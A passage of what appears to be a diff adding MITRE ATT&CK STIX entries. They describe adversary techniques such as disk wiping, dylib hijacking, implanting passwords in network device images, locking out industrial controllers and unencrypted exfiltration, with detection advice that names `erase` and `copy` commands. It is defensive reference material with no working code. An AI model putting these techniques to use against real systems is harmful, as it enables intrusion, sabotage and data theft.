"Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved September 9, 2019.", + "url": "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017" + }, + { + "source_name": "Microsoft CLR Integration 2017", + "description": "Microsoft. (2017, June 19). Common Language Runtime Integration. Retrieved July 8, 2019.", + "url": "https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017" + }, + { + "source_name": "NetSPI SQL Server CLR", + "description": "Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies. Retrieved July 8, 2019.", + "url": "https://blog.netspi.com/attacking-sql-server-clr-assemblies/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-09T20:51:03.049Z", + "name": "Data from Local System", + "description": "Adversaries may target and collect data from local system sources, such as file systems, configuration files, or local databases. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes.\n\nAdversaries may do this using [Command-Line Interface](https://attack.mitre.org/techniques/T0807) or [Scripting](https://attack.mitre.org/techniques/T0853) techniques to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T0802) on the local system. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "File: File Access", + "Process: Process Creation", + "Script: Script Execution", + "Process: OS API Execution", + "Command: Command Execution" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "created": "2023-03-30T18:56:02.424Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0893", + "external_id": "T0893" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Network Device Authentication", + "description": "Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.\n\n[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: Mandiant - Synful Knock)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nDetection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd", + "created": "2020-10-19T17:58:04.155Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1556/004", + "external_id": "T1556.004" + }, + { + "source_name": "Mandiant - Synful Knock", + "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.", + "url": "https://www.mandiant.com/resources/synful-knock-acis" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:14.123Z", + "name": "Change Credential", + "description": "Adversaries may modify software and device credentials to prevent operator and responder access. Depending on the device, the modification or addition of this password could prevent any device configuration actions from being accomplished and may require a factory reset or replacement of hardware. These credentials are often built-in features provided by the device vendors as a means to restrict access to management interfaces.\n\nAn adversary with access to valid or hardcoded credentials could change the credential to prevent future authorized device access. Change Credential may be especially damaging when paired with other techniques such as Modify Program, Data Destruction, or Modify Controller Tasking. In these cases, a device’s configuration may be destroyed or include malicious actions for the process environment, which cannot not be removed through normal device configuration actions. \n\nAdditionally, recovery of the device and original configuration may be difficult depending on the features provided by the device. In some cases, these passwords cannot be removed onsite and may require that the device be sent back to the vendor for additional recovery steps.\n\n\nA chain of incidents occurred in Germany, where adversaries locked operators out of their building automation system (BAS) controllers by enabling a previously unset BCU key. (Citation: German BAS Lockout Dec 2021) \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Felix Eberstaller" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "created": "2023-03-30T14:04:17.023Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0892", + "external_id": "T0892" + }, + { + "source_name": "German BAS Lockout Dec 2021", + "description": "Kelly Jackson Higgins. (2021, December 20). Lights Out: Cyberattacks Shut Down Building Automation Systems. Retrieved March 30, 2023.", + "url": "https://www.darkreading.com/attacks-breaches/lights-out-cyberattacks-shut-down-building-automation-systems" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T13:00:33.303Z", + "name": "Disk Content Wipe", + "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.\n\nFor network infrastructure devices, collect AAA logging to monitor for `erase` commands that delete critical configuration files.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", + "created": "2020-02-20T22:06:41.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1561/001", + "external_id": "T1561.001" + }, + { + "source_name": "DOJ Lazarus Sony 2018", + "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", + "url": "https://www.justice.gov/opa/press-release/file/1092091/download" + }, + { + "source_name": "Novetta Blockbuster Destructive Malware", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.", + "url": "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + }, + { + "source_name": "Novetta Blockbuster", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", + "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + }, + { + "source_name": "Microsoft Sysmon v6 May 2017", + "description": "Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Exfiltration Over Unencrypted Non-C2 Protocol", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "William Cain", + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) \n\nFor network infrastructure devices, collect AAA logging to monitor for `copy` commands being run to exfiltrate configuration files to non-standard destinations over unencrypted protocols such as TFTP.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "x_mitre_network_requirements": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "created": "2020-03-15T15:37:47.583Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1048/003", + "external_id": "T1048.003" + }, + { + "source_name": "copy_cmd_cisco", + "description": "Cisco. (2022, August 16). copy - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-20T17:01:10.138Z", + "name": "Modify Program", + "description": "Adversaries may modify or add a program on a controller to affect how it interacts with the physical process, peripheral devices and other hosts on the network. Modification to controller programs can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append. \n\nProgram modification encompasses the addition and modification of instructions and logic contained in Program Organization Units (POU) (Citation: IEC February 2013) and similar programming elements found on controllers. This can include, for example, adding new functions to a controller, modifying the logic in existing functions and making new calls from one function to another. \n\nSome programs may allow an adversary to interact directly with the native API of the controller to take advantage of obscure features or vulnerabilities.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Operational Databases: Device Alarm", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0889", + "external_id": "T0889" + }, + { + "source_name": "IEC February 2013", + "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ", + "url": "https://webstore.iec.ch/publication/4552" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-31T14:00:00.188Z", + "name": "Dylib Hijacking", + "description": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.\n\nAdversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. \n\nRun path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, and LC_RPATH. Other special keywords are recognized by the macOS loader are @rpath, @loader_path, and @executable_path.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the otool -l command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490", + "created": "2020-03-16T15:23:30.896Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/004", + "external_id": "T1574.004" + }, + { + "source_name": "MalwareUnicorn macOS Dylib Injection MachO", + "description": "Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021.", + "url": "https://malwareunicorn.org/workshops/macos_dylib_injection.html#5" + }, + { + "source_name": "Apple Developer Doco Archive Run-Path", + "description": "Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021.", + "url": "https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html" + }, + { + "source_name": "Wardle Dylib Hijacking OSX 2015", + "description": "Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved March 29, 2021.", + "url": "https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf" + }, + { + "source_name": "Writing Bad Malware for OSX", + "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.", + "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf" + }, + { + "source_name": "Wardle Dylib Hijack Vulnerable Apps", + "description": "Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021.", + "url": "https://objective-see.com/blog/blog_0x46.html" + }, + { + "source_name": "wardle artofmalware volume1", + "description": "Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.", + "url": "https://taomm.org/vol1/pdfs.html" + }, + { + "source_name": "Github EmpireProject HijackScanner", + "description": "Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021.", + "url": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py" + }, + { + "source_name": "Github EmpireProject CreateHijacker Dylib", + "description": "Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021.", + "url": "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Downgrade System Image", + "description": "Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001). ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Many embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "created": "2020-10-19T19:53:10.576Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1601/002", + "external_id": "T1601.002" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-07-14T13:04:04.591Z", + "name": "Local Accounts", + "description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Containers", + "Network" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "created": "2020-03-13T20:26:46.695Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1078/003", + "external_id": "T1078.003" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-15T11:41:47.274Z", + "name": "Exploitation for Defense Evasion", + "description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.\n\nThere have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries (Citation: Salesforce zero-day in facebook phishing attack), evade security logs (Citation: Bypassing CloudTrail in AWS Service Catalog), or deploy hidden infrastructure.(Citation: GhostToken GCP flaw)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "John Lambert, Microsoft Threat Intelligence Center" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "SaaS", + "IaaS" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "System access controls" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1211", + "external_id": "T1211" + }, + { + "source_name": "Salesforce zero-day in facebook phishing attack", + "description": "Bill Toulas. (2023, August 2). Hackers exploited Salesforce zero-day in Facebook phishing attack. Retrieved September 18, 2023.", + "url": "https://www.bleepingcomputer.com/news/security/hackers-exploited-salesforce-zero-day-in-facebook-phishing-attack/" + }, + { + "source_name": "Bypassing CloudTrail in AWS Service Catalog", + "description": "Nick Frichette. (2023, March 20). Bypassing CloudTrail in AWS Service Catalog, and Other Logging Research. Retrieved September 18, 2023.", + "url": "https://securitylabs.datadoghq.com/articles/bypass-cloudtrail-aws-service-catalog-and-other/" + }, + { + "source_name": "GhostToken GCP flaw", + "description": "Sergiu Gatlan. (2023, April 21). GhostToken GCP flaw let attackers backdoor Google accounts. Retrieved September 18, 2023.", + "url": "https://www.bleepingcomputer.com/news/security/ghosttoken-gcp-flaw-let-attackers-backdoor-google-accounts/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Trusted Developer Utilities Proxy Execution", + "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Casey Smith", + "Matthew Demaske, Adaptforward" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.\n\nUse process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after 